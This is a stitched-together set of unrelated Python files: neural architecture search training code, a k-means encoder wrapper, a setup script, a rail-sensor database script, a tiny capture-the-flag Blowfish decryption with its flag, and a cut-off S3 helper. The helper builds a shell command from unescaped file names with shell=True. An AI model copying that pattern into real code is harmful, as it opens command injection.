cur_model_id=cur_model_id) else: run_manager.save_model({ 'epoch': epoch, 'best_acc': run_manager.best_acc, 'optimizer': run_manager.optimizer.state_dict(), 'state_dict': run_manager.net.state_dict(), }, is_best=is_best) # different submodels are sampled during each step, many submodels are trained in one epoch # total num of epochs = warmup_epochs + num_epoch # dynamic_batchsize sets the number of different models trained in each step(using the same data), loss is then backpropped together def train_supernet_one_epoch(run_manager, args, epoch, warmup_epochs=0, warmup_lr=0): dynamic_net = run_manager.net # switch to train mode dynamic_net.train() run_manager.run_config.train_loader.sampler.set_epoch(epoch) MyRandomResizedCrop.EPOCH = epoch nBatch = len(run_manager.run_config.train_loader) data_time = AverageMeter() losses = DistributedMetric('train_loss') top1 = DistributedMetric('train_top1') top5 = DistributedMetric('train_top5') # with tqdm(total=nBatch, # desc='Train Epoch #{}'.format(epoch + 1), # disable=not run_manager.is_root) as t: end = time.time() for i, (images, labels) in enumerate(run_manager.run_config.train_loader): data_time.update(time.time() - end) if epoch < warmup_epochs: new_lr = run_manager.run_config.warmup_adjust_learning_rate( run_manager.optimizer, warmup_epochs * nBatch, nBatch, epoch, i, warmup_lr, ) else: new_lr = run_manager.run_config.adjust_learning_rate( run_manager.optimizer, epoch - warmup_epochs, i, nBatch ) images, labels = images.cuda(), labels.cuda() target = labels # soft target if args.kd_ratio > 0: args.teacher_model.train() with torch.no_grad(): soft_logits = args.teacher_model(images).detach() soft_label = F.softmax(soft_logits, dim=1) # clear gradients run_manager.optimizer.zero_grad() loss_of_subnets, acc1_of_subnets, acc5_of_subnets = [], [], [] # compute output subnet_str = '' for _ in range(args.dynamic_batch_size): # set random seed before sampling if args.independent_distributed_sampling: subnet_seed = os.getpid() + time.time() else: subnet_seed = int('%d%.3d%.3d' % (epoch * nBatch + i, _, 0)) random.seed(subnet_seed) subnet_settings = dynamic_net.sample_active_subnet() subnet_str += '%d: ' % _ + ','.join(['%s_%s' % ( key, '%.1f' % subset_mean(val, 0) if isinstance(val, list) else val ) for key, val in subnet_settings.items()]) + ' || ' output = run_manager.net(images) if args.kd_ratio == 0: loss = run_manager.train_criterion(output, labels) loss_type = 'ce' else: if args.kd_type == 'ce': kd_loss = cross_entropy_loss_with_soft_target(output, soft_label) else: kd_loss = F.mse_loss(output, soft_logits) loss = args.kd_ratio * kd_loss + run_manager.train_criterion(output, labels) loss = loss * (2 / (args.kd_ratio + 1)) loss_type = '%.1fkd-%s & ce' % (args.kd_ratio, args.kd_type) # measure accuracy and record loss acc1, acc5 = accuracy(output, target, topk=(1, 5)) loss_of_subnets.append(loss) acc1_of_subnets.append(acc1[0]) acc5_of_subnets.append(acc5[0]) loss = loss / distributed.get_world_size() loss.backward() distributed.sync_grad_sum(run_manager.net) run_manager.optimizer.step() losses.update(list_mean(loss_of_subnets), images.size(0)) top1.update(list_mean(acc1_of_subnets), images.size(0)) top5.update(list_mean(acc5_of_subnets), images.size(0)) if i % 100 == 0 and torch.distributed.get_rank() == 0: string = f"Train Epoch [{epoch}] Iter [{i}/{nBatch}] " for key, value in { 'task': args.task, 'phase': args.phase, 'loss': "{:.3f}".format(losses.avg.item()), 'top1': "{:.3f}".format(top1.avg.item()), 'top5': "{:.3f}".format(top5.avg.item()), 'R': images.size(2), 'lr': "{:.3f}".format(new_lr), 'loss_type': loss_type, 'seed': str(subnet_seed), 'str': subnet_str, 'data_time': "{:.3f}".format(data_time.avg), }.items(): string += f"{key}: {value}, " print(string) # if i >= 100: # break # args.logging.info(string) # t.set_postfix({ # 'task':args.task, # 'phase':args.phase, # 'loss': losses.avg.item(), # 'top1': top1.avg.item(), # 'top5': top5.avg.item(), # 'R': images.size(2), # 'lr': new_lr, # 'loss_type': loss_type, # 'seed': str(subnet_seed), # 'str': subnet_str, # 'data_time': data_time.avg, # }) # t.update(1) end = time.time() return losses.avg.item(), top1.avg.item(), top5.avg.item() def validate_supernet(run_manager, epoch=0, is_test=True, image_size_list=None, width_mult_list=None, ks_list=None, expand_ratio_list=None, depth_list=None, additional_setting=None): dynamic_net = run_manager.net if isinstance(dynamic_net, nn.DataParallel): dynamic_net = dynamic_net.module dynamic_net.eval() if image_size_list is None: image_size_list = int2list(run_manager.run_config.data_provider.image_size, 1) if width_mult_list is None: width_mult_list = [i for i in range(len(dynamic_net.width_mult_list))] if ks_list is None: ks_list = dynamic_net.ks_list if expand_ratio_list is None: expand_ratio_list = dynamic_net.expand_ratio_list if depth_list is None: depth_list = dynamic_net.depth_list subnet_settings = [] for w in width_mult_list: for d in depth_list: for e in expand_ratio_list: for k in ks_list: for img_size in image_size_list: subnet_settings.append([{ 'image_size': img_size, 'wid': w, 'd': d, 'e': e, 'ks': k, }, 'R%s-W%s-D%s-E%s-K%s' % (img_size, w, d, e, k)]) # for w in width_mult_list: # for d in depth_list: # for e in expand_ratio_list: # for k in ks_list: # for img_size in image_size_list: # subnet_settings.append([{ # 'image_size': img_size, # 'wid': w, # 'd': d, # 'e': e, # 'ks': k, # }, 'R%s-W%s-D%s-E%s-K%s' % (img_size, w, d, e, k)]) if additional_setting is not None: subnet_settings += additional_setting losses_of_subnets, top1_of_subnets, top5_of_subnets = [], [], [] valid_log = '' for setting, name in subnet_settings: run_manager.write_log('-' * 30 + ' Validate %s ' % name + '-' * 30, 'train', should_print=True) run_manager.run_config.data_provider.assign_active_img_size(setting.pop('image_size')) # setting.pop('image_size') dynamic_net.set_active_subnet(**setting) run_manager.write_log(dynamic_net.module_str, 'train', should_print=True) run_manager.reset_running_statistics(dynamic_net) loss, top1, top5 = run_manager.validate(epoch=epoch, is_test=is_test, run_str=name, net=dynamic_net) losses_of_subnets.append(loss) top1_of_subnets.append(top1) top5_of_subnets.append(top5) valid_log += '%s (%.3f), ' % (name, top1) return list_mean(losses_of_subnets), list_mean(top1_of_subnets), list_mean(top5_of_subnets), valid_log def match_loss(gw_syn, gw_real, dis_metric='per-filter-cos'): dis = torch.tensor(0.0).cuda() if dis_metric == 'per-filter-cos': for ig in range(len(gw_real)): gwr = gw_real[ig] gws = gw_syn[ig] dis += distance_wb(gwr, gws) elif dis_metric == 'mse': gw_real_vec = [] gw_syn_vec = [] for ig in range(len(gw_real)): gw_real_vec.append(gw_real[ig].reshape((-1))) gw_syn_vec.append(gw_syn[ig].reshape((-1))) gw_real_vec = torch.cat(gw_real_vec, dim=0) gw_syn_vec = torch.cat(gw_syn_vec, dim=0) dis = torch.sum((gw_syn_vec - gw_real_vec) ** 2) elif dis_metric == 'cos': gw_real_vec = [] gw_syn_vec = [] for ig in range(len(gw_real)): gw_real_vec.append(gw_real[ig].reshape((-1))) gw_syn_vec.append(gw_syn[ig].reshape((-1))) gw_real_vec = torch.cat(gw_real_vec, dim=0) gw_syn_vec = torch.cat(gw_syn_vec, dim=0) dis = 1 - torch.sum(gw_real_vec * gw_syn_vec, dim=-1) / ( torch.norm(gw_real_vec, dim=-1) * torch.norm(gw_syn_vec, dim=-1) + 0.000001) else: exit('DC error: unknown distance function') return dis def mincut_split_ofa(dist_avg, split_num): # note: this is not strictly mincut, but it's fine for this assert ( split_num == 2 or split_num == 3), 'always split into 2 or 3 groups for darts space (when using gradient to split)' assert isinstance(dist_avg, np.ndarray) vertex = [i for i in range(dist_avg.shape[0])] max_cut = 100000 if split_num == 2: for subset in chain(*map(lambda x: combinations(vertex, x), range(1, len(vertex) + 1))): if len(subset) >= 1 and len(subset) <= len(vertex) // 2: cut = 0 for edge in combinations(vertex, 2): if (edge[0] in subset and edge[1] in subset): cut += dist_avg[edge[0], edge[1]] if (edge[0] not in subset and edge[1] not in subset): cut += dist_avg[edge[0], edge[1]] if cut < max_cut: group0 = np.array([i for i in vertex if i in subset]) group1 = np.array([i for i in vertex if i not in subset]) # max_cut = cut max_cut = (dist_avg - np.tril(dist_avg)).sum() - cut best_groups = [group0, group1] elif split_num == 3: group1 = np.array([0]) group2 = np.array([1]) group3 = np.array([2]) max_cut = (dist_avg - np.tril(dist_avg)).sum() best_groups = [group1, group2, group3] return best_groups, max_cut def random_split_ofa(split_num, num_ops): # when split_num == num_ops -> split every operation like few-shot NAS assert num_ops % split_num == 0, 'always split into even groups for 201' if split_num == num_ops: # exhaustive split opids = np.arange(0, num_ops) else: opids = np.random.permutation(num_ops) group_size = num_ops // split_num groups = [opids[s:s + group_size] for s in np.arange(0, num_ops, group_size)] return groups # split a supernet into subnets, return encodings of splitted supernet def split_supernet(run_manager, args, split_eid, split_crit, split_num, dis_metric='cos'): # switch to train mode run_manager.net.train() if split_crit == 'grad': if split_eid is None: eids = [] # for i in range(1, 3): for i in range(1, len(run_manager.net.blocks)): if run_manager.net.blocks[i].mobile_inverted_conv.kernel_size_enc.sum(dim=-1) == run_manager.net.blocks[ i].mobile_inverted_conv.kernel_size_enc.size(0): eids.append(i) else: eids = [split_eid] best_edge_score, best_eid, best_groups = 0, 9999, None for eid in eids: repeat = 100 dist_avg = 0 # print(eid, run_manager.net.blocks[eid].mobile_inverted_conv.kernel_size_enc) n_choices = run_manager.net.blocks[eid].mobile_inverted_conv.kernel_size_enc.size(0) for _ in range(repeat): encs = [None] ## fetch data (one batch for now) images, labels = next(iter(run_manager.run_config.train_loader)) images, labels = images.cuda(), labels.cuda() target = labels # soft target if args.kd_ratio > 0: args.teacher_model.train() with torch.no_grad(): soft_logits = args.teacher_model(images).detach() soft_label = F.softmax(soft_logits, dim=1) # clear gradients run_manager.optimizer.zero_grad() subnet_settings = run_manager.net.sample_active_subnet() split_op_grads = [] for opid in range(n_choices): run_manager.net.blocks[eid].mobile_inverted_conv.active_kernel_size = \ run_manager.net.blocks[eid].mobile_inverted_conv.kernel_size_list[opid] output = run_manager.net(images) if args.kd_ratio == 0: loss = run_manager.train_criterion(output, labels) loss_type = 'ce' else: if args.kd_type == 'ce': kd_loss = cross_entropy_loss_with_soft_target(output, soft_label) else: kd_loss = F.mse_loss(output, soft_logits) loss = args.kd_ratio * kd_loss + run_manager.train_criterion(output, labels) loss = loss * (2 / (args.kd_ratio + 1)) loss = loss / distributed.get_world_size() run_manager.net.zero_grad() loss.backward() distributed.sync_grad_sum(run_manager.net) ## get gradients grads = run_manager.net.get_split_gradients(split_eid=eid) grads = [g.clone().detach() for g in grads] split_op_grads.append(grads) ## compute matching scores (redundant as dist_mat is symmetric, but good for debugging) dist_mat = torch.zeros((n_choices, n_choices)) for opid_i in range(n_choices): for opid_j in range(n_choices): dist_mat[opid_i, opid_j] = match_loss(split_op_grads[opid_i], split_op_grads[opid_j], dis_metric=dis_metric) dist_avg += dist_mat dist_avg /= repeat if run_manager.is_root: print('\n' + 'edge ' + str(eid) + ' distance matrix:') print('\n' + str(dist_avg)) # TODO: write in the Writer ## partition groups, edge_score = mincut_split_ofa(dist_avg.numpy(), split_num) # TODO implement the max-cut algorithm to split the supernet if run_manager.is_root: print('edge ' + str(eid), groups, edge_score) ## compute edge score if edge_score > best_edge_score: best_edge_score = edge_score best_eid = eid best_groups = groups split_eid = best_eid groups = best_groups elif split_crit == 'fewshot': # when num_ops == split_num, reuse random split eid = split_eid n_choices = run_manager.net.blocks[eid].mobile_inverted_conv.kernel_size_enc.size(0) groups = random_split_ofa(split_num, n_choices) else: print(f"ERROR: UNRECOGNIZED SPLIT CRITERIA: {split_crit}"); exit(1) encs_splitted = [] for group in groups: n_choices = run_manager.net.blocks[eid].mobile_inverted_conv.kernel_size_enc.size(0) enc = torch.zeros(n_choices) enc[torch.LongTensor(group)] = 1 encs_splitted.append(enc) return encs_splitted, split_eid def finetune_validate(run_manager, epoch=0, is_test=True, subnet_settings=None, image_size_list=None, width_mult_list=None, ks_list=None, expand_ratio_list=None, depth_list=None, additional_setting=None): dynamic_net = run_manager.net if isinstance(dynamic_net, nn.DataParallel): dynamic_net = dynamic_net.module dynamic_net.eval() if image_size_list is None: image_size_list = int2list(run_manager.run_config.data_provider.image_size, 1) if width_mult_list is None: width_mult_list = [i for i in range(len(dynamic_net.width_mult_list))] if ks_list is None: ks_list = dynamic_net.ks_list if expand_ratio_list is None: expand_ratio_list = dynamic_net.expand_ratio_list if depth_list is None: depth_list = dynamic_net.depth_list # subnet_settings = [] # for w in width_mult_list: # for d in depth_list: # for e in expand_ratio_list: # for k in ks_list: # for img_size in image_size_list: # subnet_settings.append([{ # 'image_size': img_size, # 'wid': w, # 'd': d, # 'e': e, # 'ks': k, # }, 'R%s-W%s-D%s-E%s-K%s' % (img_size, w, d, e, k)]) # if additional_setting is not None: # subnet_settings += additional_setting losses_of_subnets, top1_of_subnets, top5_of_subnets = [], [], [] valid_log = '' run_manager.write_log('-' * 30 + ' Validate ' + '-' * 30, 'train', should_print=True) run_manager.run_config.data_provider.assign_active_img_size(224) # setting.pop('image_size') # dynamic_net.set_active_subnet(**subnet_settings) dynamic_net.set_active_subnet(ks=subnet_settings['ks'], e=subnet_settings['e'], d=subnet_settings['d']) run_manager.write_log(dynamic_net.module_str, 'train', should_print=True) run_manager.reset_running_statistics(dynamic_net) loss, top1, top5 = run_manager.validate(epoch=epoch, is_test=is_test, net=dynamic_net) losses_of_subnets.append(loss) top1_of_subnets.append(top1) top5_of_subnets.append(top5) valid_log += '(%.3f), ' % (top1) # for setting, name in subnet_settings: # print(setting) # run_manager.write_log('-' * 30 + ' Validate %s ' % name + '-' * 30, 'train', should_print=True) # run_manager.run_config.data_provider.assign_active_img_size(setting.pop('image_size')) # # setting.pop('image_size') # dynamic_net.set_active_subnet(**setting) # run_manager.write_log(dynamic_net.module_str, 'train', should_print=True) # # run_manager.reset_running_statistics(dynamic_net) # loss, top1, top5 = run_manager.validate(epoch=epoch, is_test=is_test, run_str=name, net=dynamic_net) # losses_of_subnets.append(loss) # top1_of_subnets.append(top1) # top5_of_subnets.append(top5) # valid_log += '%s (%.3f), ' % (name, top1) return list_mean(losses_of_subnets), list_mean(top1_of_subnets), list_mean(top5_of_subnets), valid_log def finetune_net(run_manager, args, subnet_settings=None, validate_func=None): if validate_func is None: validate_func = finetune_validate for epoch in range(run_manager.start_epoch, run_manager.end_epoch + args.warmup_epochs): train_loss, train_top1, train_top5 = finetune_net_one_epoch( run_manager, args, epoch, args.warmup_epochs, args.warmup_lr, subnet_settings) if (epoch + 1) % args.validation_frequency == 0: # validate under train mode val_loss, val_acc, val_acc5, _val_log = validate_func(run_manager, epoch=epoch, is_test=True, subnet_settings=subnet_settings) # best_acc is_best = val_acc > run_manager.best_acc run_manager.best_acc = max(run_manager.best_acc, val_acc) if run_manager.is_root: val_log = 'Valid [{0}/{1}] loss={2:.3f}, top-1={3:.3f} ({4:.3f})'. \ format(epoch + 1 - args.warmup_epochs, run_manager.run_config.n_epochs, val_loss, val_acc, run_manager.best_acc) val_log += ', Train top-1 {top1:.3f}, Train loss {loss:.3f}\t'.format(top1=train_top1, loss=train_loss) val_log += _val_log run_manager.write_log(val_log, 'valid', should_print=False) run_manager.save_model({ 'epoch': epoch, 'best_acc': run_manager.best_acc, 'optimizer': run_manager.optimizer.state_dict(), 'state_dict': run_manager.net.state_dict(), }, is_best=is_best) def finetune_net_one_epoch(run_manager, args, epoch, warmup_epochs=0, warmup_lr=0, subnet_settings=None): dynamic_net = run_manager.net # switch to train mode dynamic_net.train() run_manager.run_config.train_loader.sampler.set_epoch(epoch) MyRandomResizedCrop.EPOCH = epoch nBatch = len(run_manager.run_config.train_loader) data_time = AverageMeter() losses = DistributedMetric('train_loss') top1 = DistributedMetric('train_top1') top5 = DistributedMetric('train_top5') end = time.time() for i, (images, labels) in enumerate(run_manager.run_config.train_loader): data_time.update(time.time() - end) if epoch < warmup_epochs: new_lr = run_manager.run_config.warmup_adjust_learning_rate( run_manager.optimizer, warmup_epochs * nBatch, nBatch, epoch, i, warmup_lr, ) else: new_lr = run_manager.run_config.adjust_learning_rate( run_manager.optimizer, epoch - warmup_epochs, i, nBatch ) images, labels = images.cuda(), labels.cuda() target = labels if isinstance(run_manager.run_config.mixup_alpha, float): # transform data random.seed(int('%d%.3d' % (i, epoch))) lam = random.betavariate(run_manager.run_config.mixup_alpha, run_manager.run_config.mixup_alpha) images = mix_images(images, lam) labels = mix_labels( labels, lam, run_manager.run_config.data_provider.n_classes, run_manager.run_config.label_smoothing ) # soft target if args.kd_ratio > 0: args.teacher_model.train() with torch.no_grad(): soft_logits = args.teacher_model(images).detach() soft_label = F.softmax(soft_logits, dim=1) # clear gradients run_manager.optimizer.zero_grad() loss_of_subnets, acc1_of_subnets, acc5_of_subnets = [], [], [] # compute output subnet_str = '' for _ in range(args.dynamic_batch_size): # set random seed before sampling if args.independent_distributed_sampling: subnet_seed = os.getpid() + time.time() else: subnet_seed = int('%d%.3d%.3d' % (epoch * nBatch + i, _, 0)) random.seed(subnet_seed) # subnet_settings = dynamic_net.sample_active_subnet() dynamic_net.set_active_subnet(ks=subnet_settings['ks'], e=subnet_settings['e'], d=subnet_settings['d']) subnet_str += '%d: ' % _ + ','.join(['%s_%s' % ( key, '%.1f' % subset_mean(val, 0) if isinstance(val, list) else val ) for key, val in subnet_settings.items()]) + ' || ' output = run_manager.net(images) if args.kd_ratio == 0: loss = run_manager.train_criterion(output, labels) loss_type = 'ce' else: if args.kd_type == 'ce': kd_loss = cross_entropy_loss_with_soft_target(output, soft_label) else: kd_loss = F.mse_loss(output, soft_logits) loss = args.kd_ratio * kd_loss + run_manager.train_criterion(output, labels) loss = loss * (2 / (args.kd_ratio + 1)) loss_type = '%.1fkd-%s & ce' % (args.kd_ratio, args.kd_type) # measure accuracy and record loss acc1, acc5 = accuracy(output, target, topk=(1, 5)) loss_of_subnets.append(loss) acc1_of_subnets.append(acc1[0]) acc5_of_subnets.append(acc5[0]) loss = loss / distributed.get_world_size() loss.backward() distributed.sync_grad_sum(run_manager.net) run_manager.optimizer.step() losses.update(list_mean(loss_of_subnets), images.size(0)) top1.update(list_mean(acc1_of_subnets), images.size(0)) top5.update(list_mean(acc5_of_subnets), images.size(0)) if i % 100 == 0 and torch.distributed.get_rank() == 0: string = f"Train Epoch [{epoch}] Iter [{i}/{nBatch}] " for key, value in { 'task': args.task, 'phase': args.phase, 'loss': "{:.3f}".format(losses.avg.item()), 'top1': "{:.3f}".format(top1.avg.item()), 'top5': "{:.3f}".format(top5.avg.item()), 'R': images.size(2), 'lr': "{:.3f}".format(new_lr), 'loss_type': loss_type, 'seed': str(subnet_seed), 'data_time': "{:.3f}".format(data_time.avg), }.items(): string += f"{key}: {value}, " print(string) end = time.time() return losses.avg.item(), top1.avg.item(), top5.avg.item() import _pqkmeans import typing from .encoder_base import EncoderBase class EncoderSample(EncoderBase): def __init__(self): self._impl = _pqkmeans.EncoderSample() def fit_generator(self, x_train): # type: (typing.Iterable[typing.Iterable[float]]) -> None self._impl.fit_generator(x_train) def transform_generator(self, x_test): # type: (typing.Iterable[typing.Iterator[float]]) -> Any for vector in x_test: yield self._impl.transform_one(vector) def inverse_transform_generator(self, x_test): # type: (typing.Iterable[typing.Iterator[int]]) -> Any for vector in x_test: yield self._impl.inverse_transform_one(vector) 0 from setuptools import setup, find_packages setup( name="svm40_exporter", version="0.1.0", description="Prometheus Exporter for Sensirion SVM40 Evaluation Kit", author="", author_email="", url="https://github.com/maveonair/svm40-exporter", packages=find_packages("src"), package_dir={"": "src"}, install_requires=["sensirion-shdlc-svm40>=0.3.0", "prometheus_client>=0.10.1"], scripts=["scripts/svm40-exporter"], ) xrandx/Python-Items0 #!/usr/bin/env python # -*- coding: utf-8 -*- import pymysql import numpy as np import configparser from sqlalchemy.orm import sessionmaker from sqlalchemy.ext.declarative import declarative_base from sqlalchemy import func, distinct from sqlalchemy.dialects.mysql import DOUBLE from sqlalchemy import create_engine, Column, Integer, String from os import path from sys import argv from datetime import datetime, timedelta CURRENT_DIR = path.dirname(path.realpath(argv[0])) + "\\" input_table_mapper = {} config = configparser.ConfigParser() config.read(CURRENT_DIR + "setting.ini", encoding="utf-8") host = config['mysql']['host'].strip() username = config['mysql']['username'].strip() password = config['mysql']['password'].strip() port = config['mysql']['port'].strip() database_name = config['mysql']['database'].strip() import_file_name = config['import_file']['name'].strip() NUM_SCALE = 6 MINI_EPS = 1e-6 mysql_config = 'mysql+pymysql://%s:%s@%s:%s/%s?charset=utf8' % (username, password, host, port, database_name) engine = create_engine(mysql_config, echo=False) # expire_on_commit=False Base = declarative_base() DbSession = sessionmaker(bind=engine) session = DbSession() class InputDataModel: # 输入值:时间、轨温T_r、应变差值ε_d # 输出值:轨温、冻胀高度、锁定轨温、应力 id = Column(Integer, primary_key=True, index=True, autoincrement=True) date = Column(String(32), index=True) time = Column(String(32)) temperature = Column(DOUBLE) strain = Column(DOUBLE) k_packet_num = Column(Integer) k = Column(DOUBLE) b = Column(DOUBLE) k0_packet_num = Column(Integer) k0 = Column(DOUBLE) b0 = Column(DOUBLE) k0_accumulate = Column(DOUBLE) mutation_accumulate = Column(DOUBLE) height = Column(DOUBLE) tsf = Column(DOUBLE) stress = Column(DOUBLE) def fmt(x): if x is None: return 0.0 else: return round(float(x), NUM_SCALE) # 最小二乘法 def least_square(former_days_list): x = [fmt(data.temperature) for data in former_days_list] y = [fmt(data.strain) for data in former_days_list] x, y = np.array(x), np.array(y) coefficient = np.polyfit(x, y, 1) return fmt(coefficient[0]), fmt(coefficient[1]) def parse_time(date, time): year_s, mon_s, day_s = date.strip().split('/') h, m, s = time.strip().split(':') return datetime(int(year_s), int(mon_s), int(day_s), int(h), int(m), int(s)) def is_time_less3h(date, time, date2, time2): a = parse_time(date, time) b = parse_time(date2, time2) tmp = a - b return abs(tmp) < timedelta(hours=3) def get_k_packet_num_by_date(days, InputDataClass): query_data = session.query(InputDataClass.date) \ .order_by(InputDataClass.id.desc()) \ .distinct(InputDataClass.date) \ .limit(days) recent_days = [v[0] for v in query_data] recent_data_list = session.query(InputDataClass) \ .filter(InputDataClass.date.in_(recent_days)) \ .all() temp = least_square(recent_data_list) return temp[0], temp[1], len(recent_data_list) def get_k_b_by_packet_num(packet_num, InputDataClass): former_days_list = session.query(InputDataClass) \ .order_by(InputDataClass.id.desc()) \ .limit(packet_num) temp = least_square(former_days_list) return temp[0], temp[1] def get_k_b_k0_b0(InputDataClass, flag_day_num, last_data, src_data): recorded_day_count = session.query(func.count(distinct(InputDataClass.date))).scalar() new_day = False if last_data.date != src_data.date: new_day = True acc_days = recorded_day_count + int(new_day) # d > 16 if acc_days > flag_day_num + 1: k, b = get_k_b_by_packet_num(last_data.k_packet_num, InputDataClass) return last_data.k0_packet_num, last_data.k0, last_data.b0, last_data.k_packet_num, k, b,last_data.k0_accumulate # 3 <= d <= 16 elif 3 <= acc_days <= flag_day_num + 1: # 3 <= d <= 16 new day if new_day: # d = 3, 8, 16 new day if acc_days in [3, 8, 16]: k0 = 0.0 b0 = 0.0 k0_accumulate = 0 k0_packet_num = 0 if acc_days == 3: k0, b0, k0_packet_num = get_k_packet_num_by_date(2, InputDataClass) k0_accumulate = 0 elif acc_days == 8: k0, b0, k0_packet_num = get_k_packet_num_by_date(7, InputDataClass) k0_accumulate = k0 - last_data.k0 elif acc_days == 16: k0, b0, k0_packet_num = get_k_packet_num_by_date(15, InputDataClass) k0_accumulate = k0 - last_data.k0 + last_data.k0_accumulate k_packet_num = k0_packet_num k, b = get_k_b_by_packet_num(k_packet_num, InputDataClass) return k0_packet_num, k0, b0, k_packet_num, k, b, k0_accumulate # d = 4, 5, 6, 7, 9, ... , 16 new day else: k_packet_num = last_data.k_packet_num + 1 k, b = get_k_b_by_packet_num(k_packet_num, InputDataClass) return last_data.k0_packet_num, last_data.k0, last_data.b0, k_packet_num, k, b, last_data.k0_accumulate # 3 < d <= 16 not new day else: if acc_days == 16: k, b = get_k_b_by_packet_num(last_data.k_packet_num, InputDataClass) return last_data.k0_packet_num, last_data.k0, last_data.b0, last_data.k_packet_num, k, b, last_data.k0_accumulate else: k_packet_num = last_data.k_packet_num + 1 k, b = get_k_b_by_packet_num(k_packet_num, InputDataClass) return last_data.k0_packet_num, last_data.k0, last_data.b0, k_packet_num, k, b, last_data.k0_accumulate # d < 3 elif acc_days < 3: return None def parser_form(data): if data is None: return None data.temperature = fmt(data.temperature) data.strain = fmt(data.strain) data.k0 = fmt(data.k0) data.b0 = fmt(data.b0) data.k = fmt(data.k) data.b = fmt(data.b) data.k0_accumulate = fmt(data.k0_accumulate) data.mutation_accumulate = fmt(data.mutation_accumulate) return data def get_param(src_data, InputDataClass): last_data = session.query(InputDataClass) \ .order_by(InputDataClass.id.desc()) \ .first() last_data = parser_form(last_data) if last_data is None: return None tmp = get_k_b_k0_b0(InputDataClass, 15, last_data, src_data) if tmp is None: return None else: k0_packet_num, k0, b0, k_packet_num, k, b, k0_accumulate = tmp mutation = (src_data.strain - last_data.mutation_accumulate - last_data.strain) -\ (k0 * (src_data.temperature - last_data.temperature)) mutation = fmt(mutation) delta_t = abs(src_data.temperature - last_data.temperature) if delta_t < MINI_EPS: deviation = True else: deviation = abs(mutation / delta_t) - 180 > MINI_EPS truth = is_time_less3h(src_data.date, src_data.time, last_data.date, last_data.time) \ and (abs(mutation) - 400 > MINI_EPS) \ and deviation if truth: return k0_packet_num, k0, b0, k_packet_num, k, b, k0_accumulate, last_data.mutation_accumulate + mutation else: return k0_packet_num, k0, b0, k_packet_num, k, b, k0_accumulate, last_data.mutation_accumulate def compute_save(data, InputDataClass): # 更新参数 Mnemonic.param tmp = get_param(data, InputDataClass) # None : < 3 days if tmp is not None: k0_packet_num, k0, b0, k_packet_num, k, b, k0_accumulate, mutation_accumulate = tmp data.height = fmt((-k + k0 - k0_accumulate) * 0.5 + mutation_accumulate * 0.0189) # Tsf = (K - K[0] - ΣΔk0) * 0.075 + (B - B[0]) * 0.015 + 总Δε * 0.08475 data.tsf = fmt((k - k0 - k0_accumulate) * 0.075 + (b - b0) * 0.015 + mutation_accumulate * 0.08475) data.strain -= mutation_accumulate # stress = -11.8 * 0.21 * (temperature - tsf) data.stress = fmt(0.21 * (-11.8) * (data.temperature - data.tsf)) data.k0 = k0 data.b0 = b0 data.k0_packet_num = k0_packet_num data.k0_accumulate = k0_accumulate data.b = b data.k = k data.k_packet_num = k_packet_num data.mutation_accumulate = mutation_accumulate print_str = "%s|%s|%s|%s|%s|%s" % (InputDataClass.__tablename__, data.date, data.time, data.height, data.tsf, data.stress) print(print_str) session.add(data) session.flush() def mapper_generate(table_mapper_dict, Model, device_name, table_prefix): table_name = '%s_%s' % (table_prefix, device_name) if table_name not in table_mapper_dict: table_mapper_dict[table_name] = type( table_name, (Model, Base), {'__tablename__': table_name} ) return table_mapper_dict[table_name] def generate_class(device_name: str): device_name = device_name.lower() input_tmp = mapper_generate(input_table_mapper, InputDataModel, device_name, "ef_statistics") return input_tmp def get_data(tmp, InputDataClass): return InputDataClass(date=tmp[1], time=tmp[2], temperature=fmt(tmp[3]), strain=fmt(tmp[4])) def get_data_str(line): tmp = line.strip().split('|') return [x.strip() for x in tmp] def read_from_file(InputDataClass): global import_file_name text_list = [] with open(CURRENT_DIR + import_file_name, 'r', encoding="utf-8") as f: while True: line = f.readline() if not line: break text_list.append(line) data_list = [] try: for line in text_list: str_list = get_data_str(line) data_list.append(get_data(str_list, InputDataClass)) except Exception as e: print(e) print("注意当前也许存在的格式问题") return data_list def deal_by_cmd(): tmp = get_data_str(argv[1]) InputDataClass = generate_class(tmp[0]) Base.metadata.create_all(engine) # 拿到最新参数 data = get_data(tmp, InputDataClass) compute_save(data, InputDataClass) def deal_by_file(): device_name = config['import_file']['device'].strip() InputDataClass = generate_class(device_name) Base.metadata.create_all(engine) import_file_list = read_from_file(InputDataClass) # 拿到最新参数 for i in range(len(import_file_list)): print("====== 文本输入模式 ======") print("从文件 %s 处理设备 %s 的数据" % (import_file_name, device_name)) print("正在处理第 %d 包数据" % (i + 1)) compute_save(import_file_list[i], InputDataClass) def class_init_by_config(): devices = config['mysql']['devices'].strip().split(',') devices = [name.strip() for name in devices] for device_name in devices: generate_class(device_name) def main(): class_init_by_config() if len(argv) != 2: print("参数无效") if argv[1] == "-f": deal_by_file() else: deal_by_cmd() if __name__ == '__main__': main() session.commit() session.close() #!/usr/bin/env python from Crypto.Cipher import Blowfish #flag = 'zjgsuctf{bl0wf15h_bl0ws_y0U_4way~~~}' key = '\x00' * 8 ciphertext = 'iogH/g==' cipher = Blowfish.new(key, Blowfish.MODE_ECB) plaintext = cipher.decrypt(ciphertext.decode('base64')) print plaintext yqsongGitHub/rnaseq-reportrnaseq_report/modules/rnaseq_data_generation_information/__init__.py1-10 from __future__ import absolute_import from .data_generation_information import MultiqcModule0 import os.path import shutil import subprocess import sys import boto3 # noinspection PyPackageRequirements import botocore # noinspection PyPackageRequirements import botocore.exceptions import pypipegzip def copyfileobj(source, destination, buffer_size=1024 * 1024): """ Copy a file from source to destination. source and destination must be file-like objects, i.e. any object with a read or write method, like for example StringIO. """ while True: copy_buffer = source.read(buffer_size) if not copy_buffer: break destination.write(copy_buffer) def gzip_file(file_in: str, file_out: str) -> None: with open(file_in, 'rb') as f_in: f_out = pypipegzip.pypipegzip.zipopen(file_out, 'wb') shutil.copyfileobj(f_in, f_out) f_out.close() def gzip_file_process(file_in: str, file_out: str) -> None: subprocess.check_call( f"gzip < {file_in} > {file_out}", shell=True, ) def object_exists(s3_connection, check_bucket_name: str, object_name: str) -> bool: """ It seems funny we have to write this method but it seems that this is the way to check if an s3 bucket has an object. http://stackoverflow.com/questions/33842944/check-if-a-key-exists-in-a-bucket-in-s3-using-boto3 :param s3_connection: :param check_bucket_name: :param object_name: :return: whether the object exists """ try: # s3_connection.Object(check_bucket_name, object_name).load() s3_connection.head_object(Bucket=check_bucket_name, Key=object_name) except botocore.exceptions.ClientError as e: if e.response['Error']['Code'] == "404": return False raise return True def object_exists_bucket(bucket_obj, object_name: str) -> bool: """ see the note above :param 